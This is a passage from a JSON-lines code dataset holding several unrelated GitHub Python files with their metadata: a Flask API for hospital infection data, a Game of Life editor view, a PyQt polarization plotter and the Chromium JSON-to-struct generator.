Flask(__name__)\r\napp.config['JSON_SORT_KEYS'] = False #New line from Stackoverflow.com - See above\r\napp.config[\"DEBUG\"] = True\r\napi = Api(app)\r\n\r\n#conn = pyodbc.connect('Driver={SQL Server};'\r\n# \t\t 'Server=DATABASESERVER,1433;'\r\n#\t\t\t\t\t 'Database=API_BayeSniffer;'\r\n#\t\t\t\t\t 'Trusted_Connection=yes;')\r\n#cursor = conn.cursor()\t\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return '''\r\n
    Welcome to the BayeSniffer!\r\n    Enjoy selecting posterior Probability of \"Health\" Things!\r\n    Healthcare Associated Infections\r\n    Healthcare Associated Infections = NC\r\n    Healthcare Associated Infections: State=NC & Provider = 340053
    \r\n'''\r\n\r\n@app.route('/bayesniffer_api/v1/resources/HAII/all', methods=['GET'])\r\ndef api_HAI_all():\r\n\r\n\tconn = pyodbc.connect('Driver={SQL Server};'\r\n\t\t\t\t\t\t 'Server=DATABASESERVER,1433;'\r\n\t\t\t\t\t\t 'Database=API_BayeSniffer;'\r\n\t\t\t\t\t\t 'Trusted_Connection=yes;')\r\n\twith conn:\r\n\t cursor = conn.cursor()\t\r\n\r\n#\tcursor.execute('SELECT * FROM API_BayeSniffer.dbo.HAI_Master;')\r\n\tcursor.execute('SELECT Hospital, Provider,Address,City,State,ZIP_Code,\\\r\n\t Start_Date,End_Date,HAI,Better,Worse,Same,Score,Rank\\\r\n\t FROM API_BayeSniffer.dbo.HAI_Master \\\r\n\t\tORDER BY HAI_Master.[Hospital];')\r\n\r\n\tdesc = cursor.description\r\n\tcolumn_names = [col[0] for col in desc] #This puts SQL date into json\r\n\tdata = [dict(zip(column_names, row)) \r\n\t\t\tfor row in cursor.fetchall()]\r\n#\tprint(data)\r\n\r\n\treturn jsonify(data)\r\n\r\n@app.route('/bayesniffer_api/v1/resources/HAII', methods=['GET'])\r\ndef api_filter():\r\n\r\n conn = pyodbc.connect('Driver={SQL Server};' # Connection object #\r\n \t\t 'Server=DATABASESERVER,1433;'\r\n\t\t \t\t\t 'Database=API_BayeSniffer;'\r\n\t\t\t \t\t 'Trusted_Connection=yes;')\r\n with conn:\r\n cur = conn.cursor()\t #Once you have a Connection, you can create a Cursor object and call its execute() method to perform SQL commands. \r\n\t\t #See ref 1,\r\n\r\n query_parameters = request.args\t #This is a Flask request object that stores all the parameter values\r\n Provider = query_parameters.get('Provider')\r\n Hospital = query_parameters.get('Hospital')\r\n State = query_parameters.get('State')\r\n\t\t\r\n# query = \"SELECT * FROM API_BayeSniffer.dbo.HAI_Master WHERE\"\r\n query = ('SELECT Hospital, Provider,Address,City,State,ZIP_Code,\\\r\n\t\t\t\t\tStart_Date,End_Date,HAI,Better,Same,Worse,Score,Rank\\\r\n\t\t\t\t\tFROM API_BayeSniffer.dbo.HAI_Master WHERE')\r\n\t\t\r\n to_filter = [] #Initializing a dictionary of empty lists\r\n if Provider:\r\n query += ' Provider=? AND'\r\n to_filter.append(Provider) #SQL append clause\r\n if Hospital:\r\n query += ' Hospital=? AND'\r\n to_filter.append(Hospital)\r\n if State:\r\n query += ' State=? AND'\r\n to_filter.append(State)\r\n if not (State):\r\n return page_not_found(404)\r\n\r\n query = query[:-4] + ';'\r\n\t\r\n results = cur.execute(query, to_filter).fetchall()\t\r\n\r\n desc = cur.description\r\n column_names = [col[0] for col in desc] #This puts SQL date into json\r\n data = [dict(zip(column_names, row)) \r\n for row in results] #When I put in \"results\" it serialized the data. 
\r\n return jsonify(data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n# app.run(host='127.0.0.1')\r\n app.run(host='192.168.2.253')\t\r\n# app.run(host='50.197.246.137')\t\r\napp.run()\r\n\r\n#/api/v1/resources/HAII/all'\r\n#http://127.0.0.1:5000/api/v1/resources/books/all \r\n#http://127.0.0.1:5000/api/v1/resources/books?author=Connie+Willis \r\n#http://127.0.0.1:5000/api/v1/resources/books?author=Connie+Willis&published=1999 \r\n#http://127.0.0.1:5000/api/v1/resources/books?published=2010\r\n#http://127.0.0.1:5000/api/v1/resources/HAII/all \r\n#http://127.0.0.1:5000/api/v1/resources/HAII?State=NC\r\n#http://127.0.0.1:5000/api/v1/resources/HAII?author=Connie+Willis&published=1999 \r\n#http://127.0.0.1:5000/api/v1/resources/HAII?published=2010", "repo_name": "jeffgroversr/python_code", "sub_path": "gunicorn_restful_v1.py", "file_name": "gunicorn_restful_v1.py", "file_ext": "py", "file_size_in_byte": 5394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 32, "usage_type": "call"}, {"api_name": "pyodbc.connect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "pyodbc.connect", "line_number": 76, "usage_type": "call"}, {"api_name": "flask_restful.request.args", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask_restful.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "40043233600", "text": "\"\"\"\nThe Game Creation View module creates a view for placing cells for Conway's Game of Life\n\"\"\"\n\nimport arcade\nfrom data import constants\nfrom data.game_view import GameView\nfrom data.board import Board\nfrom random import randint\n\nclass GameCreationView(arcade.View):\n \"\"\"\n The Game Creation View is used to create the initial setup for Conway's Game of Life\n \"\"\"\n def __init__(self, window: arcade.Window):\n \"\"\"\n The class constructor\n \"\"\"\n super().__init__(window=window)\n\n self.window = window\n\n self.board = Board(constants.BOARD_WIDTH, constants.BOARD_HEIGHT)\n\n self.board_dx = constants.SCREEN_WIDTH / self.board.width\n self.board_dy = constants.SCREEN_HEIGHT / self.board.height\n self.text_shown = True\n\n def on_show(self):\n \"\"\"\n Designs the grid for cell placement\n \"\"\"\n self.board.reset()\n\n def on_draw(self):\n \"\"\"\n Displays the grid for cell placement or the hint text\n \"\"\"\n arcade.start_render()\n\n if not self.text_shown:\n for cell in self.board.initial_cells:\n arcade.draw_lrtb_rectangle_filled(cell[0] * self.board_dx, cell[0] * self.board_dx + self.board_dx, cell[1] * self.board_dy + self.board_dy, cell[1] * self.board_dy, arcade.color.GREEN_YELLOW)\n\n for x in range(constants.BOARD_WIDTH + 1):\n x_pos = x * self.board_dx\n arcade.draw_lrtb_rectangle_filled(x_pos - 0.5, x_pos + 0.5, constants.SCREEN_HEIGHT - 1, 0, arcade.color.WHITE)\n for y in range(constants.BOARD_HEIGHT + 1):\n y_pos = y * self.board_dy\n arcade.draw_lrtb_rectangle_filled(0, constants.SCREEN_WIDTH - 1, y_pos + 0.5, y_pos - 0.5, arcade.color.WHITE)\n \n else:\n arcade.draw_text('Press \"R\" to randomize the cell creation\\nPress \"ESC\" to exit or return to the creation menu if in game\\nPress \"Enter\" to start\\nPress \"X\" to clear all cells\\nPress \"H\" to hide/show this text and show/hide grid for 
cell placement', 0, 0, arcade.color.WHITE, bold=True, font_size=15)\n\n def on_key_press(self, key, modifiers):\n \"\"\"\n Called whenever a key is pressed\n\n Args:\n key: Library used in the constant module\n \"\"\"\n if key == constants.ESCAPE_KEY:\n self.window.close()\n \n if key == arcade.key.ENTER:\n self.window.show_view(GameView(self.window, self, self.board))\n\n if key == arcade.key.X:\n self.board.clear(True)\n \n if key == arcade.key.R:\n self.board.clear(True)\n for x in range(self.board.width):\n for y in range(self.board.height):\n if randint(*constants.RANDOM_CELL_CREATION_RANGE) == 1:\n self.board.add_cell((x, y), True)\n \n if key == arcade.key.H:\n self.text_shown = not self.text_shown\n\n def on_mouse_press(self, _x, _y, _button, _modifiers):\n \"\"\"\n Determines the cell placement\n \n Args:\n _x: x axis position of the mouse press\n _y: y axis position of the mouse press\n _button: Conditions created from button press\n \"\"\"\n \n if not self.text_shown:\n board_x = int(_x // self.board_dx)\n board_y = int(_y // self.board_dy)\n\n self.board.flip_cell((board_x, board_y))", "repo_name": "ethancharles02/conways_game_of_life", "sub_path": "game_of_life/data/game_creation_view.py", "file_name": "game_creation_view.py", "file_ext": "py", "file_size_in_byte": 3453, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "arcade.View", "line_number": 11, "usage_type": "attribute"}, {"api_name": "arcade.Window", "line_number": 15, "usage_type": "attribute"}, {"api_name": "data.board.Board", "line_number": 23, "usage_type": "call"}, {"api_name": "data.constants.BOARD_WIDTH", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 23, "usage_type": "name"}, {"api_name": "data.constants.BOARD_HEIGHT", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data.constants.SCREEN_WIDTH", "line_number": 25, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 25, "usage_type": "name"}, {"api_name": "data.constants.SCREEN_HEIGHT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 26, "usage_type": "name"}, {"api_name": "arcade.start_render", "line_number": 39, "usage_type": "call"}, {"api_name": "arcade.draw_lrtb_rectangle_filled", "line_number": 43, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 43, "usage_type": "attribute"}, {"api_name": "data.constants.BOARD_WIDTH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 45, "usage_type": "name"}, {"api_name": "arcade.draw_lrtb_rectangle_filled", "line_number": 47, "usage_type": "call"}, {"api_name": "data.constants.SCREEN_HEIGHT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 47, "usage_type": "name"}, {"api_name": "arcade.color", "line_number": 47, "usage_type": "attribute"}, {"api_name": "data.constants.BOARD_HEIGHT", "line_number": 48, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 48, "usage_type": "name"}, {"api_name": "arcade.draw_lrtb_rectangle_filled", "line_number": 50, "usage_type": "call"}, {"api_name": "data.constants.SCREEN_WIDTH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 50, "usage_type": "name"}, {"api_name": "arcade.color", "line_number": 50, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 53, "usage_type": "call"}, 
{"api_name": "arcade.color", "line_number": 53, "usage_type": "attribute"}, {"api_name": "data.constants.ESCAPE_KEY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 62, "usage_type": "name"}, {"api_name": "arcade.key", "line_number": 65, "usage_type": "attribute"}, {"api_name": "data.game_view.GameView", "line_number": 66, "usage_type": "call"}, {"api_name": "arcade.key", "line_number": 68, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 71, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 75, "usage_type": "call"}, {"api_name": "data.constants.RANDOM_CELL_CREATION_RANGE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 75, "usage_type": "name"}, {"api_name": "arcade.key", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "35315206213", "text": "# Imports - standard modules\nimport sys\n\n# Import matplotlib and set it to use Qt5Agg for plotting\nimport matplotlib as mpl\nmpl.use(\"Qt5Agg\")\n\n# Import QtCore QtWidgets from PyQt5\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n# Import functions from scipy library for scientific simulation\nfrom numpy import pi, linspace, sin, cos, tan, arcsin, arccos, arctan, array, dot\n\n# Import matplotlib backends\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FC\nfrom matplotlib.figure import Figure\n\n# Import pyplot from matplotlib for plotting\nfrom matplotlib import pyplot as plt\n\ndef getAngles(EOne, ETwo, delta):\n # Calculate the three parameters for the elliptical polarization\n # Auxillary angle: alpha\n # tan(alpha) = Ey/Ex\n # Ex = EOne cos(omega t); Let t= 0; therefore \n # Ex = EOne\n # Ey = ETwo cos(omega t + delta)\n # Ey = ETwo cos(delta)\n alpha = arctan(ETwo*cos(delta)/EOne)\n alphaDeg = alpha*180.0/pi\n \n # gamma: Angle of rotation\n # tan(2 gamma) = tan(2 alpha)*cos(delta)\n gamma = 1.0/2.0*arctan( tan(2*alpha)*cos(delta))\n gammaDeg = gamma*180.0/pi\n\n # Ellipticity angle: chi\n # sin(2 chi) = sin(2 alpha)* sin(delta)\n chi = 1.0/2.0*arcsin( sin(2*alpha) * sin(delta) )\n chiDeg = chi*180./pi\n\n # Return the rotation, auxillary and ellipticity angles in that order\n return gammaDeg, alphaDeg, chiDeg\n\n# Create an class derived from the FigureCanvas class. 
This is the canvas on which the sinewaves will be plotted\nclass MplCanvas(FC):\n    def __init__(self, parent=None, width=8, height=6.5, EOne=2.5, ETwo=1, delta=pi/2):\n        fig = Figure(figsize=(width, height))\n        self.ax = fig.add_subplot(111)\n        \n        # Clear the axes every time the plot is called\n        #self.ax.hold(False)\n\n        # Set the figure to the canvas\n        FC.__init__(self, fig)\n        \n        # Set some standard figure policies\n        FC.setSizePolicy(self, QSizePolicy.Expanding, QSizePolicy.Expanding)\n        FC.updateGeometry(self)\n        \n        # Draw the plot\n        self.drawPlot(EOne, ETwo, delta)\n\n\n    def drawPlot(self, EOne, ETwo, delta):\n        self.ax.clear() # important !!!! this clears the axes so earlier plots are not kept (the original source code did not have this line!)\n\n        r = ETwo/EOne\n\n        # We will generate the points on the ellipse manually\n        N=1024\n        theta = linspace(0,2*pi,N)\n\n        # Get the Cartesian coordinates of the ellipse for these theta values\n        x = cos(theta)\n        y = r*cos(theta+delta)\n\n        # self.ax.plot(T[0],T[1],'r')\n        self.ax.plot(x,y,'k')\n        self.ax.set_ylim(-EOne-0.5,EOne+0.5)\n        self.ax.set_xticklabels([])\n        self.ax.set_yticklabels([])\n        self.draw()\n\n# Define the mainwindow class\nclass MainApp(QMainWindow):\n    def __init__ (self):\n        \"\"\" Constructor or the initializer \"\"\"\n        QMainWindow.__init__ (self)\n        \n        # Set some default attributes of the window\n        self.setAttribute(Qt.WA_DeleteOnClose)\n        self.setWindowTitle(\"Elliptical Polarization\")\n        \n        # define the main widget as self\n        self.main_widget = QWidget(self)\n\n        # Add the label widgets and sliders\n        # x-Component Amplitude\n        self.loEOne = QVBoxLayout()\n        self.lblEOne = QLabel(\"x-Component: E1\", self)\n        self.sldEOne = QSlider(Qt.Horizontal)\n        self.sldEOne.setMinimum(2)\n        self.sldEOne.setMaximum(50)\n        self.sldEOne.setValue(25)\n        self.sldEOne.setTickPosition(QSlider.TicksBelow)\n        self.sldEOne.setTickInterval(1)\n        self.edtEOne = QLineEdit(self)\n        self.edtEOne.setMaxLength(5)\n        self.loEOne.addWidget(self.lblEOne)\n        self.loEOne.addSpacing(3)\n        self.loEOne.addWidget(self.sldEOne)\n        self.loEOne.addSpacing(3)\n        self.loEOne.addWidget(self.edtEOne)\n        \n        # Add the label widgets and sliders\n        # y-Component Amplitude\n        self.loETwo = QVBoxLayout()\n        self.lblETwo = QLabel(\"y-Component: E2\", self)\n        self.sldETwo = QSlider(Qt.Horizontal)\n        self.sldETwo.setMinimum(2)\n        self.sldETwo.setMaximum(25)\n        self.sldETwo.setValue(12)\n        self.sldETwo.setTickPosition(QSlider.TicksBelow)\n        self.sldETwo.setTickInterval(1)\n        self.edtETwo = QLineEdit(self)\n        self.edtETwo.setMaxLength(5)\n        self.loETwo.addWidget(self.lblETwo)\n        self.loETwo.addSpacing(3)\n        self.loETwo.addWidget(self.sldETwo)\n        self.loETwo.addSpacing(3)\n        self.loETwo.addWidget(self.edtETwo)\n\n        # Phase difference - all absorbed in y-component\n        self.loPhase = QVBoxLayout()\n        self.lblPhase = QLabel(\"Phase difference: delta (pi rad)\", self)\n        self.sldPhase = QSlider(Qt.Horizontal)\n        self.sldPhase.setMinimum(0)\n        self.sldPhase.setMaximum(20*pi*100) ########3\n        self.sldPhase.setValue(10)\n        self.sldPhase.setTickPosition(QSlider.TicksBelow)\n        self.sldPhase.setTickInterval(1)\n        self.edtPhase = QLineEdit(self)\n        self.edtPhase.setMaxLength(5)\n        self.loPhase.addWidget(self.lblPhase)\n        self.loPhase.addSpacing(3)\n        self.loPhase.addWidget(self.sldPhase)\n        self.loPhase.addSpacing(3)\n        self.loPhase.addWidget(self.edtPhase)\n        \n        # Waves Param Layout\n        self.loWaveParams = QHBoxLayout()\n        self.loWaveParams.addLayout(self.loEOne)\n        self.loWaveParams.addStretch()\n        self.loWaveParams.addLayout(self.loETwo)\n        self.loWaveParams.addStretch()\n        self.loWaveParams.addLayout(self.loPhase)\n        \n        # Get the values 
from the sliders \n EOne = self.sldEOne.value()/10\n ETwo = self.sldETwo.value()/10\n delta = self.sldPhase.value()/(100*pi) - 10.0\n self.edtEOne.setText(str(EOne))\n self.edtETwo.setText(str(ETwo))\n self.edtPhase.setText(str(delta))\n\n # Get the rotation, auxillary, and ellipticity angles\n gammaDeg, alphaDeg, chiDeg = getAngles(EOne, ETwo, delta)\n\n # Create an instance of the FigureCanvas\n self.loCanvas = MplCanvas(self.main_widget, width=5, height=4, EOne=EOne, ETwo=ETwo, delta=delta)\n\n # Auxillary Angle\n self.loAuxAngle = QHBoxLayout()\n self.lblAuxAngle = QLabel(\"Auxillary Angle: (deg)\", self)\n self.lblAuxAngleVal = QLabel(str(\"%5.2f\" %(alphaDeg)), self)\n self.loAuxAngle.addWidget(self.lblAuxAngle)\n self.loAuxAngle.addSpacing(3)\n self.loAuxAngle.addWidget(self.lblAuxAngleVal)\n\n # Rotation Angle\n self.loRotAngle = QHBoxLayout()\n self.lblRotAngle = QLabel(\"Rotation Angle: (deg)\", self)\n self.lblRotAngleVal = QLabel(str(\"%5.2f\" %(gammaDeg)), self)\n self.loRotAngle.addWidget(self.lblRotAngle)\n self.loRotAngle.addSpacing(3)\n self.loRotAngle.addWidget(self.lblRotAngleVal)\n\n # Ellipticity Angle\n self.loEllAngle = QHBoxLayout()\n self.lblEllAngle = QLabel(\"Ellipticity Angle: (deg)\", self)\n self.lblEllAngleVal = QLabel(str(\"%5.2f\" %(chiDeg)), self)\n self.loEllAngle.addWidget(self.lblEllAngle)\n self.loEllAngle.addSpacing(3)\n self.loEllAngle.addWidget(self.lblEllAngleVal)\n \n # Set the focus to the main_widget and set it to be central widget\n self.main_widget.setFocus()\n self.setCentralWidget(self.main_widget)\n \n # Populate the master layout\n self.loMaster = QVBoxLayout(self.main_widget)\n self.loMaster.addLayout(self.loWaveParams)\n self.loMaster.addWidget(self.loCanvas)\n self.loMaster.addLayout(self.loRotAngle)\n self.loMaster.addLayout(self.loAuxAngle)\n self.loMaster.addLayout(self.loEllAngle)\n \n # Connect slots\n self.sldEOne.valueChanged.connect(self.OnEOneChanged)\n self.sldETwo.valueChanged.connect(self.OnETwoChanged)\n self.sldPhase.valueChanged.connect(self.OnPhaseChanged)\n self.edtEOne.editingFinished.connect(self.OnEdtEOneChanged)\n self.edtETwo.editingFinished.connect(self.OnEdtETwoChanged)\n self.edtPhase.editingFinished.connect(self.OnEdtPhaseChanged)\n \n def OnEOneChanged(self):\n EOne = self.sldEOne.value()/10\n self.edtEOne.setText(str(EOne))\n self.sldETwo.setMaximum(EOne*10-1) #####\n self.OnSomethingChanged()\n \n def OnETwoChanged(self):\n ETwo = self.sldETwo.value()/10\n self.edtETwo.setText(str(ETwo))\n self.OnSomethingChanged()\n \n def OnPhaseChanged(self):\n delta = self.sldPhase.value()/(100*pi) - 10.0\n self.edtPhase.setText(str(delta))\n self.OnSomethingChanged()\n\n def OnEdtEOneChanged(self):\n EOne = self.edtEOne.text()\n self.sldEOne.setValue(float(EOne)*10)\n \n def OnEdtETwoChanged(self):\n ETwo = self.edtETwo.text()\n self.sldETwo.setValue(float(ETwo)*10) ########\n \n def OnEdtPhaseChanged(self):\n delta = self.edtPhase.text()\n self.sldPhase.setValue((float(delta)+10.0)*pi*100.0) #######\n\n def OnSomethingChanged(self):\n\n EOne = self.sldEOne.value()/10\n ETwo = self.sldETwo.value()/10\n delta = self.sldPhase.value()/100\n # Get the rotation, auxillary, and ellipticity angles\n gammaDeg, alphaDeg, chiDeg = getAngles(EOne, ETwo, delta)\n self.lblRotAngleVal.setText(str(\"%.2f\" %(gammaDeg)))\n self.lblAuxAngleVal.setText(str(\"%.2f\" %(alphaDeg)))\n self.lblEllAngleVal.setText(str(\"%.2f\" %(chiDeg)))\n\n self.loCanvas.drawPlot(EOne,ETwo,delta)\n\nif __name__ == \"__main__\":\n app = 
QApplication(sys.argv)\n MyApp = MainApp()\n MyApp.show()\n app.exec()\n", "repo_name": "xu-nuo-xu/Understanding_Optics_with_Python", "sub_path": "programs/chapter8/Listing_8-3.py", "file_name": "Listing_8-3.py", "file_ext": "py", "file_size_in_byte": 9321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.arctan", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.tan", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.arcsin", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.figure.Figure", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.setSizePolicy", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.updateGeometry", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 73, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 230, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 244, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 260, "usage_type": "attribute"}]} +{"seq_id": "12309333775", "text": "import json\nfrom datetime import datetime\nimport os.path\nimport sys\nimport optparse\nimport re\n_script_path = os.path.realpath(__file__)\n\nsys.path.insert(0, os.path.normpath(_script_path + \"/../../json_comment_eater\"))\ntry:\n import json_comment_eater\nfinally:\n sys.path.pop(0)\n\nimport struct_generator\nimport element_generator\n\nHEAD = \"\"\"// Copyright %d The Chromium Authors. 
All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\n// GENERATED FROM THE SCHEMA DEFINITION AND DESCRIPTION IN\n// %s\n// %s\n// DO NOT EDIT.\n\n\"\"\"\n\ndef _GenerateHeaderGuard(h_filename):\n \"\"\"Generates the string used in #ifndef guarding the header file.\n \"\"\"\n result = re.sub('[%s\\\\\\\\.]' % os.sep, '_', h_filename.upper())\n return re.sub('^_*', '', result) + '_' # Remove leading underscores.\n\ndef _GenerateH(basepath, fileroot, head, namespace, schema, description):\n \"\"\"Generates the .h file containing the definition of the structure specified\n by the schema.\n\n Args:\n basepath: The base directory in which files are generated.\n fileroot: The filename and path, relative to basepath, of the file to\n create, without an extension.\n head: The string to output as the header of the .h file.\n namespace: A string corresponding to the C++ namespace to use.\n schema: A dict containing the schema. See comment at the top of this file.\n description: A dict containing the description. See comment at the top of\n this file.\n \"\"\"\n\n h_filename = fileroot + '.h'\n with open(os.path.join(basepath, h_filename), 'w') as f:\n f.write(head)\n\n header_guard = _GenerateHeaderGuard(h_filename)\n f.write('#ifndef %s\\n' % header_guard)\n f.write('#define %s\\n' % header_guard)\n f.write('\\n')\n\n f.write('#include \\n')\n f.write('\\n')\n\n for header in schema.get('headers', []):\n f.write('#include \"%s\"\\n' % header)\n f.write('\\n')\n\n if namespace:\n f.write('namespace %s {\\n' % namespace)\n f.write('\\n')\n\n f.write(struct_generator.GenerateStruct(\n schema['type_name'], schema['schema']))\n f.write('\\n')\n\n for var_name, value in description.get('int_variables', {}).items():\n f.write('extern const int %s;\\n' % var_name)\n f.write('\\n')\n\n for element_name, element in description['elements'].items():\n f.write('extern const %s %s;\\n' % (schema['type_name'], element_name))\n\n if namespace:\n f.write('\\n')\n f.write('} // namespace %s\\n' % namespace)\n\n f.write('\\n')\n f.write( '#endif // %s\\n' % header_guard)\n\ndef _GenerateCC(basepath, fileroot, head, namespace, schema, description):\n \"\"\"Generates the .cc file containing the static initializers for the\n of the elements specified in the description.\n\n Args:\n basepath: The base directory in which files are generated.\n fileroot: The filename and path, relative to basepath, of the file to\n create, without an extension.\n head: The string to output as the header of the .cc file.\n namespace: A string corresponding to the C++ namespace to use.\n schema: A dict containing the schema. See comment at the top of this file.\n description: A dict containing the description. 
See comment at the top of\n this file.\n \"\"\"\n\n with open(os.path.join(basepath, fileroot + '.cc'), 'w') as f:\n f.write(head)\n\n f.write('#include \"%s\"\\n' % (fileroot + '.h'))\n f.write('\\n')\n\n if namespace:\n f.write('namespace %s {\\n' % namespace)\n f.write('\\n')\n\n f.write(element_generator.GenerateElements(schema['type_name'],\n schema['schema'], description))\n\n if namespace:\n f.write('\\n')\n f.write('} // namespace %s\\n' % namespace)\n\ndef _Load(filename):\n \"\"\"Loads a JSON file int a Python object and return this object.\n \"\"\"\n # TODO(beaudoin): When moving to Python 2.7 use object_pairs_hook=OrderedDict.\n with open(filename, 'r') as handle:\n result = json.loads(json_comment_eater.Nom(handle.read()))\n return result\n\ndef GenerateStruct(basepath, output_root, namespace, schema, description,\n description_filename, schema_filename, year=None):\n \"\"\"Generates a C++ struct from a JSON description.\n\n Args:\n basepath: The base directory in which files are generated.\n output_root: The filename and path, relative to basepath, of the file to\n create, without an extension.\n namespace: A string corresponding to the C++ namespace to use.\n schema: A dict containing the schema. See comment at the top of this file.\n description: A dict containing the description. See comment at the top of\n this file.\n description_filename: The description filename. This is added to the\n header of the outputted files.\n schema_filename: The schema filename. This is added to the header of the\n outputted files.\n year: Year to display next to the copy-right in the header.\n \"\"\"\n year = int(year) if year else datetime.now().year\n head = HEAD % (year, schema_filename, description_filename)\n _GenerateH(basepath, output_root, head, namespace, schema, description)\n _GenerateCC(basepath, output_root, head, namespace, schema, description)\n\nif __name__ == '__main__':\n parser = optparse.OptionParser(\n description='Generates an C++ array of struct from a JSON description.',\n usage='usage: %prog [option] -s schema description')\n parser.add_option('-b', '--destbase',\n help='base directory of generated files.')\n parser.add_option('-d', '--destdir',\n help='directory to output generated files, relative to destbase.')\n parser.add_option('-n', '--namespace',\n help='C++ namespace for generated files. 
e.g search_providers.')\n parser.add_option('-s', '--schema', help='path to the schema file, '\n 'mandatory.')\n parser.add_option('-o', '--output', help='output filename, ')\n (opts, args) = parser.parse_args()\n\n if not opts.schema:\n parser.error('You must specify a --schema.')\n\n description_filename = os.path.normpath(args[0])\n root, ext = os.path.splitext(description_filename)\n shortroot = opts.output if opts.output else os.path.split(root)[1]\n if opts.destdir:\n output_root = os.path.join(os.path.normpath(opts.destdir), shortroot)\n else:\n output_root = shortroot\n\n if opts.destbase:\n basepath = os.path.normpath(opts.destbase)\n else:\n basepath = ''\n\n schema = _Load(opts.schema)\n description = _Load(description_filename)\n GenerateStruct(basepath, output_root, opts.namespace, schema, description,\n description_filename, opts.schema)\n", "repo_name": "kiwibrowser/src", "sub_path": "tools/json_to_struct/json_to_struct.py", "file_name": "json_to_struct.py", "file_ext": "py", "file_size_in_byte": 6552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.path.realpath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 7, "usage_type": "name"}, {"api_name": "sys.path.insert", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.path.normpath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 9, "usage_type": "name"}, {"api_name": "sys.path.pop", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 32, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 51, "usage_type": "name"}, {"api_name": "struct_generator.GenerateStruct", "line_number": 